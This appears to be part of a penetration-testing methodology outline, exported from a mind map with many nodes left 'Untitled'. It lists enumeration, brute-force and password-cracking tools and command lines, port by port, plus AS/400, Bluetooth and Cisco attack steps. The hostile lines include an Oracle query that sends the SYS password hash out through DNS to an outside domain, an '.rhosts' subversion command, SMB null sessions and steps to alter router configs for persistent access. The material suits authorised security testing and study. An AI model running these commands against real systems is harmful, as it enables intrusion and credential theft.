15.11. NTP Port 123 open

15.11.1. NTP Enumeration

15.11.1.1. ntpdc -c monlist IP_ADDRESS

15.11.1.2. ntpdc -c sysinfo IP_ADDRESS

15.11.1.3. ntpq

15.11.1.3.1. host

15.11.1.3.2. hostname

15.11.1.3.3. ntpversion

15.11.1.3.4. readlist

15.11.1.3.5. version

15.11.2. Examine configuration files

15.11.2.1. ntp.conf

15.11.3. nmap nse script

15.11.3.1. ntp-info

15.12. NetBIOS Ports 135-139,445 open

15.12.1. NetBIOS enumeration

15.12.1.1. Enum

15.12.1.1.1. enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>

15.12.1.2. Null Session

15.12.1.2.1. net use \\192.168.1.1\ipc$ "" /u:""

15.12.1.3. Smbclient

15.12.1.3.1. smbclient -L //server/share password options

15.12.1.4. Superscan

15.12.1.4.1. Enumeration tab.

15.12.1.5. user2sid/sid2user

15.12.1.6. Winfo

15.12.2. NetBIOS brute force

15.12.2.1. Hydra

15.12.2.2. Brutus

15.12.2.3. Cain & Abel

15.12.2.4. getacct

15.12.2.5. NAT (NetBIOS Auditing Tool)

15.12.3. Examine Configuration Files

15.12.3.1. Smb.conf

15.12.3.2. lmhosts

15.13. SNMP port 161 open

15.13.1. Default Community Strings

15.13.1.1. public

15.13.1.2. private

15.13.1.3. cisco

15.13.1.3.1. cable-docsis

15.13.1.3.2. ILMI

15.13.2. MIB enumeration

15.13.2.1. Windows NT

15.13.2.1.1. .1.3.6.1.2.1.1.5 Hostnames

15.13.2.1.2. .1.3.6.1.4.1.77.1.4.2 Domain Name

15.13.2.1.3. .1.3.6.1.4.1.77.1.2.25 Usernames

15.13.2.1.4. .1.3.6.1.4.1.77.1.2.3.1.1 Running Services

15.13.2.1.5. .1.3.6.1.4.1.77.1.2.27 Share Information

15.13.2.2. Solarwinds MIB walk

15.13.2.3. Getif

15.13.2.4. snmpwalk

15.13.2.4.1. snmpwalk -v <Version> -c <Community string> <IP>

15.13.2.5. Snscan

15.13.2.6. Applications

15.13.2.6.1. ZyXel

15.13.2.7. nmap nse script

15.13.2.7.1. snmp-sysdescr

15.13.3. SNMP Bruteforce

15.13.3.1. onesixtyone

15.13.3.1.1. onesixtyone -c SNMP.wordlist <IP>

15.13.3.2. cat

15.13.3.2.1. ./cat -h <IP> -w SNMP.wordlist

15.13.3.3. Solarwinds SNMP Brute Force

15.13.3.4. ADMsnmp

15.13.3.5. nmap nse script

15.13.3.5.1. snmp-brute

15.13.4. Examine SNMP Configuration files

15.13.4.1. snmp.conf

15.13.4.2. snmpd.conf

15.13.4.3. snmp-config.xml

15.14. LDAP Port 389 Open

15.14.1. ldap enumeration

15.14.1.1. ldapminer

15.14.1.1.1. ldapminer -h ip_address -p port (not required if default) -d

15.14.1.2. luma

15.14.1.2.1. Gui based tool

15.14.1.3. ldp

15.14.1.3.1. Gui based tool

15.14.1.4. openldap

15.14.1.4.1. ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]

15.14.1.4.2. ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]

15.14.1.4.3. ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]

15.14.1.4.4. ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]

15.14.1.4.5. ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]

15.14.2. ldap brute force

15.14.2.1. bf_ldap

15.14.2.1.1. bf_ldap -s server -d domain_name -u|-U username|users_list_file -L|-l passwords_list|length_of_passwords_to_generate

15.14.2.1.2. Optional: -p port (default 389), -v (verbose mode), -P LDAP user path (default ,CN=Users,)

15.14.2.2. K0ldS

15.14.2.3. LDAP_Brute.pl

15.14.3. Examine Configuration Files

15.14.3.1. General

15.14.3.1.1. containers.ldif

15.14.3.1.2. ldap.cfg

15.14.3.1.3. ldap.conf

15.14.3.1.4. ldap.xml

15.14.3.1.5. ldap-config.xml

15.14.3.1.6. ldap-realm.xml

15.14.3.1.7. slapd.conf

15.14.3.2. IBM SecureWay V3 server

15.14.3.2.1. V3.sas.oc

15.14.3.3. Microsoft Active Directory server

15.14.3.3.1. msadClassesAttrs.ldif

15.14.3.4. Netscape Directory Server 4

15.14.3.4.1. nsslapd.sas_at.conf

15.14.3.4.2. nsslapd.sas_oc.conf

15.14.3.5. OpenLDAP directory server

15.14.3.5.1. slapd.sas_at.conf

15.14.3.5.2. slapd.sas_oc.conf

15.14.3.6. Sun ONE Directory Server 5.1

15.14.3.6.1. 75sas.ldif

15.15. PPTP/L2TP/VPN port 500/1723 open

15.15.1. Enumeration

15.15.1.1. ike-scan

15.15.1.2. ike-probe

15.15.2. Brute-Force

15.15.2.1. ike-crack

15.15.3. Reference Material

15.15.3.1. PSK cracking paper

15.15.3.2. SecurityFocus Infocus

15.15.3.3. Scanning a VPN Implementation

15.16. Modbus port 502 open

15.16.1. modscan

15.17. rlogin port 513 open

15.17.1. Rlogin Enumeration

15.17.1.1. Find the files

15.17.1.1.1. find / -name .rhosts

15.17.1.1.2. locate .rhosts

15.17.1.2. Examine Files

15.17.1.2.1. cat .rhosts

15.17.1.3. Manual Login

15.17.1.3.1. rlogin hostname -l username

15.17.1.3.2. rlogin <IP>

15.17.1.4. Subvert the files

15.17.1.4.1. echo ++ > .rhosts

15.17.2. Rlogin Brute force

15.17.2.1. Hydra

15.18. rsh port 514 open

15.18.1. Rsh Enumeration

15.18.1.1. rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command

15.18.2. Rsh Brute Force

15.18.2.1. rsh-grind

15.18.2.2. Hydra

15.18.2.3. medusa

15.19. SQL Server Port 1433 1434 open

15.19.1. SQL Enumeration

15.19.1.1. piggy

15.19.1.2. SQLPing

15.19.1.2.1. sqlping ip_address/hostname

15.19.1.3. SQLPing2

15.19.1.4. SQLPing3

15.19.1.5. SQLpoke

15.19.1.6. SQL Recon

15.19.1.7. SQLver

15.19.2. SQL Brute Force

15.19.2.1. SQLPAT

15.19.2.1.1. sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack

15.19.2.1.2. sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack

15.19.2.2. SQL Dict

15.19.2.3. SQLAT

15.19.2.4. Hydra

15.19.2.5. SQLlhf

15.19.2.6. ForceSQL

15.20. Citrix port 1494 open

15.20.1. Citrix Enumeration

15.20.1.1. Default Domain

15.20.1.2. Published Applications

15.20.1.2.1. ./citrix-pa-scan {IP_address/file | - | random} [timeout]

15.20.1.2.2. citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]

15.20.2. Citrix Brute Force

15.20.2.1. bforce.js

15.20.2.2. connect.js

15.20.2.3. Citrix Brute-forcer

15.20.2.4. Reference Material

15.20.2.4.1. Hacking Citrix - the legitimate backdoor

15.20.2.4.2. Hacking Citrix - the forceful way

15.21. Oracle Port 1521 Open

15.21.1. Oracle Enumeration

15.21.1.1. oracsec

15.21.1.2. Repscan

15.21.1.3. Sidguess

15.21.1.4. Scuba

15.21.1.5. DNS/HTTP Enumeration

15.21.1.5.1. SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL;

15.21.1.5.2. Untitled

15.21.1.6. WinSID

15.21.1.7. Oracle default password list

15.21.1.8. TNSVer

15.21.1.8.1. tnsver host [port]

15.21.1.9. TCP Scan

15.21.1.10. Oracle TNSLSNR

15.21.1.10.1. Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]

15.21.1.11. TNSCmd

15.21.1.11.1. perl tnscmd.pl -h ip_address

15.21.1.11.2. perl tnscmd.pl version -h ip_address

15.21.1.11.3. perl tnscmd.pl status -h ip_address

15.21.1.11.4. perl tnscmd.pl -h ip_address --cmdsize (40 - 200)

15.21.1.12. LSNrCheck

15.21.1.13. Oracle Security Check (needs credentials)

15.21.1.14. OAT

15.21.1.14.1. sh opwg.sh -s ip_address

15.21.1.14.2. opwg.bat -s ip_address

15.21.1.14.3. sh oquery.sh -s ip_address -u username -p password -d SID (Unix) OR c:\oquery -s ip_address -u username -p password -d SID (Windows)

15.21.1.15. OScanner

15.21.1.15.1. sh oscanner.sh -s ip_address

15.21.1.15.2. oscanner.exe -s ip_address

15.21.1.15.3. sh reportviewer.sh oscanner_saved_file.xml

15.21.1.15.4. reportviewer.exe oscanner_saved_file.xml

15.21.1.16. NGS Squirrel for Oracle

15.21.1.17. Service Register

15.21.1.17.1. Service-register.exe ip_address

15.21.1.18. PLSQL Scanner 2008

15.21.2. Oracle Brute Force

15.21.2.1. OAK

15.21.2.1.1. ora-getsid hostname port sid_dictionary_list

15.21.2.1.2. ora-auth-alter-session host port sid username password sql

15.21.2.1.3. ora-brutesid host port start

15.21.2.1.4. ora-pwdbrute host port sid username password-file

15.21.2.1.5. ora-userenum host port sid userlistfile

15.21.2.1.6. ora-ver -e (-f -l -a) host port

15.21.2.2. breakable (Targets Application Server Port)

15.21.2.2.1. breakable.exe host url [port] [v] (host: ip_address of the Oracle Portal Server; url: PATH_INFO i.e. /pls/orasso; port: TCP port the Oracle Portal Server is serving pages from; v: verbose)

15.21.2.3. SQLInjector (Targets Application Server Port)

15.21.2.3.1. sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL

15.21.2.3.2. sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle

15.21.2.4. Check Password

15.21.2.5. orabf

15.21.2.5.1. orabf [hash]:[username] [options]

15.21.2.6. thc-orakel

15.21.2.6.1. Cracker

15.21.2.6.2. Client

15.21.2.6.3. Crypto

15.21.2.7. DBVisualisor

15.21.2.7.1. Sql scripts from pentest.co.uk

15.21.2.7.2. Manual sql input of previously reported vulnerabilities

15.21.3. Oracle Reference Material

15.21.3.1. Understanding SQL Injection

15.21.3.2. SQL Injection walkthrough

15.21.3.3. SQL Injection by example

15.21.3.4. Advanced SQL Injection in Oracle databases

15.21.3.5. Blind SQL Injection

15.21.3.6. SQL Cheatsheets

15.21.3.6.1. Untitled

15.22. NFS Port 2049 open

15.22.1. NFS Enumeration

15.22.1.1. showmount -e hostname/ip_address

15.22.1.2. mount -t nfs ip_address:/directory_found_exported /local_mount_point

15.22.2. NFS Brute Force

15.22.2.1. Interact with NFS share and try to add/delete

15.22.2.2. Exploit and Confuse Unix

15.22.3. Examine Configuration Files

15.22.3.1. /etc/exports

15.22.3.2. /etc/lib/nfs/xtab

15.22.4. nmap nse script

15.22.4.1. nfs-showmount

15.23. Compaq/HP Insight Manager Port 2301, 2381 open

15.23.1. HP Enumeration

15.23.1.1. Authentication Method

15.23.1.1.1. Host OS Authentication

15.23.1.1.2. Default Authentication

15.23.1.2. Wikto

15.23.1.3. Nstealth

15.23.2. HP Bruteforce

15.23.2.1. Hydra

15.23.2.2. Acunetix

15.23.3. Examine Configuration Files

15.23.3.1. path.properties

15.23.3.2. mx.log

15.23.3.3. CLIClientConfig.cfg

15.23.3.4. database.props

15.23.3.5. pg_hba.conf

15.23.3.6. jboss-service.xml

15.23.3.7. .namazurc

15.24. MySQL port 3306 open

15.24.1. Enumeration

15.24.1.1. nmap -A -n -p3306 <IP Address>

15.24.1.2. nmap -A -n -PN --script:ALL -p3306 <IP Address>

15.24.1.3. telnet IP_Address 3306

15.24.1.4. use test; select * from test;

15.24.1.5. To check for other DB's -- show databases

15.24.2. Administration

15.24.2.1. MySQL Network Scanner

15.24.2.2. MySQL GUI Tools

15.24.2.3. mysqlshow

15.24.2.4. mysqlbinlog

15.24.3. Manual Checks

15.24.3.1. Default usernames and passwords

15.24.3.1.1. username: root password:

15.24.3.1.2. testing

15.24.3.2. Configuration Files

15.24.3.2.1. Operating System

15.24.3.2.2. Command History

15.24.3.2.3. Log Files

15.24.3.2.4. To run many sql commands at once -- mysql -u username -p < manycommands.sql

15.24.3.2.5. MySQL data directory (Location specified in my.cnf)

15.24.3.2.6. SSL Check

15.24.3.3. Privilege Escalation

15.24.3.3.1. Current Level of access

15.24.3.3.2. Access passwords

15.24.3.3.3. Create a new user and grant him privileges

15.24.3.3.4. Break into a shell

15.24.4. SQL injection

15.24.4.1. mysql-miner.pl

15.24.4.1.1. mysql-miner.pl http://target/ expected_string database

15.24.4.2. http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html

15.24.4.3. http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

15.24.5. References.

15.24.5.1. Design Weaknesses

15.24.5.1.1. MySQL running as root

15.24.5.1.2. Exposed publicly on Internet

15.24.5.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql

15.24.5.3. http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0

15.25. RDesktop port 3389 open

15.25.1. Rdesktop Enumeration

15.25.1.1. Remote Desktop Connection

15.25.2. Rdesktop Bruteforce

15.25.2.1. TSGrinder

15.25.2.1.1. tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address

15.25.2.2. Tscrack

15.26. Sybase Port 5000+ open

15.26.1. Sybase Enumeration

15.26.1.1. sybase-version ip_address from NGS

15.26.2. Sybase Vulnerability Assessment

15.26.2.1. Use DBVisualiser

15.26.2.1.1. Sybase Security checksheet

15.26.2.1.2. Manual sql input of previously reported vulnerabilities

15.26.2.2. NGS Squirrel for Sybase

15.27. SIP Port 5060 open

15.27.1. SIP Enumeration

15.27.1.1. netcat

15.27.1.1.1. nc IP_Address Port

15.27.1.2. sipflanker

15.27.1.2.1. python sipflanker.py 192.168.1-254

15.27.1.3. Sipscan

15.27.1.4. smap

15.27.1.4.1. smap IP_Address/Subnet_Mask

15.27.1.4.2. smap -o IP_Address/Subnet_Mask

15.27.1.4.3. smap -l IP_Address

15.27.2. SIP Packet Crafting etc.

15.27.2.1. sipsak

15.27.2.1.1. Tracing paths: - sipsak -T -s sip:[email protected]

15.27.2.1.2. Options request:- sipsak -vv -s sip:[email protected]

15.27.2.1.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:[email protected]

15.27.2.2. siprogue

15.27.3. SIP Vulnerability Scanning/ Brute Force

15.27.3.1. tftp bruteforcer

15.27.3.1.1. Default dictionary file

15.27.3.1.2. ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes

15.27.3.2. VoIPaudit

15.27.3.3. SiVuS

15.27.4. Examine Configuration Files

15.27.4.1. SIPDefault.cnf

15.27.4.2. asterisk.conf

15.27.4.3. sip.conf

15.27.4.4. phone.conf

15.27.4.5. sip_notify.conf

15.27.4.6. <Ethernet address>.cfg

15.27.4.7. 000000000000.cfg

15.27.4.8. phone1.cfg

15.27.4.9. sip.cfg etc. etc.

15.28. VNC port 5900^ open

15.28.1. VNC Enumeration

15.28.1.1. Scans

15.28.1.1.1. 5900^ for direct access. 5800 for HTTP access.

15.28.2. VNC Brute Force

15.28.2.1. Password Attacks

15.28.2.1.1. Remote

15.28.2.1.2. Local

15.28.3. Examine Configuration Files

15.28.3.1. .vnc

15.28.3.2. /etc/vnc/config

15.28.3.3. $HOME/.vnc/config

15.28.3.4. /etc/sysconfig/vncservers

15.28.3.5. /etc/vnc.conf

15.29. Tor Port 9001, 9030 open

15.29.1. Tor Node Checker

15.29.1.1. Ip Pages

15.29.1.2. Kewlio.net

15.29.2. nmap NSE script

15.30. Jet Direct 9100 open

15.30.1. hijetta

16. Password cracking

16.1. Rainbow crack

16.1.1. ophcrack

16.1.2. rainbow tables

16.1.2.1. rcrack c:\rainbowcrack\*.rt -f pwfile.txt

16.2. Ophcrack

16.3. Cain & Abel

16.4. John the Ripper

16.4.1. ./unshadow passwd shadow > file_to_crack

16.4.2. ./john -single file_to_crack

16.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack

16.4.4. ./john -show file_to_crack

16.4.5. ./john --incremental:All file_to_crack

16.5. fgdump

16.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt

16.6. pwdump6

16.7. medusa

16.8. LCP

16.9. L0phtcrack (Note: this tool was acquired by Symantec from @Stake and it is their policy not to ship it outside the USA and Canada)

16.9.1. Domain credentials

16.9.2. Sniffing

16.9.3. pwdump import

16.9.4. sam import

16.10. aiocracker

16.10.1. aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list

17. Vulnerability Assessment - Utilising vulnerability scanners, all discovered hosts can then be tested for vulnerabilities. The results would then be analysed to determine whether there are any vulnerabilities that could be exploited to gain access to a target host on the network. A number of tests carried out by these scanners are just banner grabbing/ obtaining version information; once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released and the matches are reported to the user. Other tools actually use manual pen testing methods and display the output received, i.e. showmount -e ip_address would display the NFS shares available to the scanner, which would then need to be verified by the tester.

17.1. Manual

17.1.1. Patch Levels

17.1.2. Confirmed Vulnerabilities

17.1.2.1. Severe

17.1.2.2. High

17.1.2.3. Medium

17.1.2.4. Low

17.2. Automated

17.2.1. Reports

17.2.2. Vulnerabilities

17.2.2.1. Severe

17.2.2.2. High

17.2.2.3. Medium

17.2.2.4. Low

17.3. Tools

17.3.1. GFI

17.3.2. Nessus (Linux)

17.3.2.1. Nessus (Windows)

17.3.3. NGS Typhon

17.3.4. NGS Squirrel for Oracle

17.3.5. NGS Squirrel for SQL

17.3.6. SARA

17.3.7. MatriXay

17.3.8. BiDiBlah

17.3.9. SSA

17.3.10. Oval Interpreter

17.3.11. Xscan

17.3.12. Security Manager +

17.3.13. Inguma

17.4. Resources

17.4.1. Security Focus

17.4.2. Microsoft Security Bulletin

17.4.3. Common Vulnerabilities and Exploits (CVE)

17.4.4. National Vulnerability Database (NVD)

17.4.5. The Open Source Vulnerability Database (OSVDB)

17.4.5.1. Standalone Database

17.4.5.1.1. Update URL

17.4.6. United States Computer Emergency Response Team (US-CERT)

17.4.7. Computer Emergency Response Team

17.4.8. Mozilla Security Information

17.4.9. SANS

17.4.10. Securiteam

17.4.11. PacketStorm Security

17.4.12. Security Tracker

17.4.13. Secunia

17.4.14. Vulnerabilities.org

17.4.15. ntbugtraq

17.4.16. Wireless Vulnerabilities and Exploits (WVE)

17.5. Blogs

17.5.1. Carnal0wnage

17.5.2. Fsecure Blog

17.5.3. g0ne blog

17.5.4. GNUCitizen

17.5.5. ha.ckers Blog

17.5.6. Jeremiah Grossman Blog

17.5.7. Metasploit

17.5.8. nCircle Blogs

17.5.9. pentestmonkey.net

17.5.10. Rational Security

17.5.12. Rise Security

17.5.13. Security Fix Blog

17.5.14. Software Vulnerability Exploitation Blog

17.5.16. Taosecurity Blog

18. AS/400 Auditing

18.1. Remote

18.1.1. Information Gathering

18.1.1.1. Nmap using common iSeries (AS/400) services.

18.1.1.1.1. Unsecured services (Port;name;description)

18.1.1.1.2. Secured services (Port;name;description)

18.1.1.2. NetCat (old school technique)

18.1.1.2.1. nc -v -z -w target ListOfServices.txt | grep "open"

18.1.1.3. Banner Grabbing

18.1.1.3.1. Telnet

18.1.1.3.2. FTP

18.1.1.3.3. HTTP Banner

18.1.1.3.4. POP3

18.1.1.3.5. SNMP

18.1.1.3.6. SMTP

18.1.2. Users Enumeration

18.1.2.1. Default AS/400 user accounts

18.1.2.2. Error messages

18.1.2.2.1. Telnet Login errors

18.1.2.2.2. POP3 authentication Errors

18.1.2.3. Qsys symbolic link (if ftp is enabled)

18.1.2.3.1. ftp target | quote stat | quote site namefmt 1

18.1.2.3.2. cd /

18.1.2.3.3. quote site listfmt 1

18.1.2.3.4. mkdir temp

18.1.2.3.5. quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys')

18.1.2.3.6. quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys')

18.1.2.3.7. dir /temp/qsys/*.usrprf

18.1.2.4. LDAP

18.1.2.4.1. Need os400-sys value from ibm-slapdSuffix

18.1.2.4.2. Tool to browse LDAP

18.1.3. Exploitation

18.1.3.1. CVE References

18.1.3.1.1. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=AS400

18.1.3.1.2. CVE-2005-1244 - Severity : High - CVSS : 7.0

18.1.3.1.3. CVE-2005-1243 - Severity : Low - CVSS : 3.3

18.1.3.1.4. CVE-2005-1242 - Severity : Low - CVSS : 3.3

18.1.3.1.5. CVE-2005-1241 - Severity : High - CVSS : 7.0

18.1.3.1.6. CVE-2005-1240 - Severity : High - CVSS : 7.0

18.1.3.1.7. CVE-2005-1239 - Severity : Low - CVSS : 3.3

18.1.3.1.8. CVE-2005-1238 - Severity : High - CVSS : 9.0

18.1.3.1.9. CVE-2005-1182 - Severity : Low - CVSS : 3.3

18.1.3.1.10. CVE-2005-1133 - Severity : Low - CVSS : 3.3

18.1.3.1.11. CVE-2005-1025 - Severity : Low - CVSS : 3.3

18.1.3.1.12. CVE-2005-0868 - Severity : High - CVSS : 7.0

18.1.3.1.13. CVE-2005-0899 - Severity : Low - CVSS : 2.3

18.1.3.1.14. CVE-2002-1822 - Severity : Low - CVSS : 3.3

18.1.3.1.15. CVE-2002-1731 - Severity : Low - CVSS : 2.3

18.1.3.1.16. CVE-2000-1038 - Severity : Low - CVSS : 3.3

18.1.3.1.17. CVE-1999-1279 - Severity : Low - CVSS : 3.3

18.1.3.1.18. CVE-1999-1012 - Severity : Low - CVSS : 3.3

18.1.3.2. Access with Work Station Gateway

18.1.3.2.1. http://target:5061/WSG

18.1.3.2.2. Default AS/400 accounts.

18.1.3.3. Network attacks (next release)

18.1.3.3.1. DB2

18.1.3.3.2. QSHELL

18.1.3.3.3. Hijacking Terminals

18.1.3.3.4. Trojan attacks

18.1.3.3.5. Hacking from AS/400

18.2. Local

18.2.1. System Value Security

18.2.1.1. Untitled

18.2.1.1.1. Untitled

18.2.1.2. Untitled

18.2.1.2.1. Untitled

18.2.1.3. Untitled

18.2.1.3.1. Untitled

18.2.1.4. Untitled

18.2.1.4.1. Recommended value is 30

18.2.2. Password Policy

18.2.2.1. Untitled

18.2.2.1.1. Untitled

18.2.2.1.2. Untitled

18.2.2.2. Untitled

18.2.2.2.1. Untitled

18.2.2.3. Untitled

18.2.2.3.1. Untitled

18.2.2.4. Untitled

18.2.2.4.1. Untitled

18.2.2.5. Untitled

18.2.3. Audit level

18.2.3.1. Untitled

18.2.3.1.1. Recommended value is *SECURITY

18.2.4. Documentation

18.2.4.1. Users class

18.2.4.1.1. Untitled

18.2.4.2. System Audit Settings

18.2.4.2.1. Untitled

18.2.4.3. Special Authorities Definitions

18.2.4.3.1. Untitled

19. Bluetooth Specific Testing

19.1. Bluescanner

19.2. Bluesweep

19.3. btscanner

19.4. Redfang

19.5. Blueprint

19.6. Bluesnarfer

19.7. Bluebugger

19.7.1. bluebugger [OPTIONS] -a <addr> [MODE]

19.8. Blueserial

19.9. Bloover

19.10. Bluesniff

19.11. Exploit Frameworks

19.11.1. BlueMaho

19.11.1.1. Untitled

19.12. Resources

19.12.1. URL's

19.12.1.1. BlueStumbler.org

19.12.1.2. Bluejackq.com

19.12.1.3. Bluejacking.com

19.12.1.4. Bluejackers

19.12.1.5. bluetooth-pentest

19.12.1.6. ibluejackedyou.com

19.12.1.7. Trifinite

19.12.2. Vulnerability Information

19.12.2.1. Common Vulnerabilities and Exploits (CVE)

19.12.2.1.1. Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth

19.12.3. White Papers

19.12.3.1. Bluesnarfing

20. Cisco Specific Testing

20.1. Methodology

20.1.1. Scan & Fingerprint.

20.1.1.1. Untitled

20.1.1.2. Untitled

20.1.1.3. If SNMP is active, then community string guessing should be performed.

20.1.2. Credentials Guessing.

20.1.2.1. Untitled

20.1.2.2. Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!

20.1.3. Connect

20.1.3.1. Untitled

20.1.3.2. If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.

20.1.4. Check for bugs

20.1.4.1. Untitled

20.1.4.1.1. The most widely known/ used are: Nessus, Retina, GFI LanGuard and Core Impact.

20.1.4.1.2. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln

20.1.5. Further your attack

20.1.5.1. Untitled

20.1.5.1.1. running-config is the currently running configuration. This gets loaded from the startup-config on boot. This configuration file is editable and the changes take effect immediately, but any changes will be lost once the router is rebooted. It is this file that requires altering to maintain a non-permanent connection through to the internal network.

20.1.5.1.2. startup-config is the boot-up configuration file. It is this file that needs altering to maintain a permanent connection through to the internal network.

20.1.5.2. Untitled

20.1.5.2.1. #> access-list 100 permit ip <IP> any

20.2. Scan & Fingerprint.

20.2.1. Port Scanning

20.2.1.1. nmap

20.2.1.1.1. Untitled

20.2.1.2. Other tools

20.2.1.2.1. Untitled

20.2.1.2.2. mass-scanner is a simple scanner for discovering Cisco devices within a given network range.

20.2.2. Fingerprinting

20.2.2.1. Untitled

20.2.2.1.1. BT cisco-torch-0.4b # cisco-torch.pl -A 10.1.1.175

20.2.2.2. Untitled

20.2.2.2.1. TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt

20.2.2.2.2. Untitled

20.3. Password Guessing.

20.3.1. Untitled

20.3.1.1. ./CAT  -h  <IP>  -a  password.wordlist

20.3.1.2. Untitled

20.3.2. Untitled

20.3.2.1. ./enabler <IP> [-u username] -p password /password.wordlist [port]

20.3.2.2. Untitled

20.3.3. Untitled

20.3.3.1. BT tmp # hydra  -l  ""  -P  password.wordlist  -t  4  <IP>  cisco

20.3.3.2. Untitled

20.4. SNMP Attacks.

20.4.1. Untitled

20.4.1.1. ./CAT  -h  <IP>  -w  SNMP.wordlist

20.4.1.2. Untitled

20.4.2. Untitled

20.4.2.1. onesixtyone -c SNMP.wordlist <IP>

20.4.2.2. BT onesixtyone-0.3.2 # onesixtyone -c dict.txt 10.1.1.175
Scanning 1 hosts, 64 communities
10.1.1.175 [enable] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
10.1.1.175 [Cisco] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug

20.4.3. Untitled

20.4.3.1. snmpwalk -v <Version> -c <Community string> <IP>

20.4.3.2. Untitled

20.5. Connecting.

20.5.1. Telnet

20.5.1.1. Untitled

20.5.1.1.1. telnet <IP>

20.5.1.1.2. Sample Banners

20.5.2. SSH

20.5.3. Web Browser

20.5.3.1. Untitled

20.5.3.1.1. This uses a combination of username and password to authenticate.  After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:

20.5.3.1.2. Authentication Required
Enter username and password for "level_15_access" at http://10.1.1.1
User Name:
Password:

20.5.3.1.3. Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.

20.5.4. TFTP

20.5.4.1. Untitled

20.5.4.1.1. Untitled

20.5.4.1.2. ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server.  Both of these tools require the config files to be saved with default names.

20.5.4.2. Untitled

20.5.4.2.1. ./cisco-torch.pl <options> <IP,hostname,network>

20.5.4.2.2. ./cisco-torch.pl <options> -F <hostlist>

20.5.4.2.3. Creating backdoors in Cisco IOS using TCL

20.6. Known Bugs.

20.6.1. Attack Tools

20.6.1.1. Untitled

20.6.1.1.1. Untitled

20.6.1.2. Untitled

20.6.1.2.1. Web browse to the Cisco device: http://<IP>

20.6.1.2.2. Untitled

20.6.1.2.3. Untitled

20.6.1.2.4. Untitled

20.6.1.3. Untitled

20.6.1.3.1. ./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt

20.6.2. Common Vulnerabilities and Exploits (CVE) Information

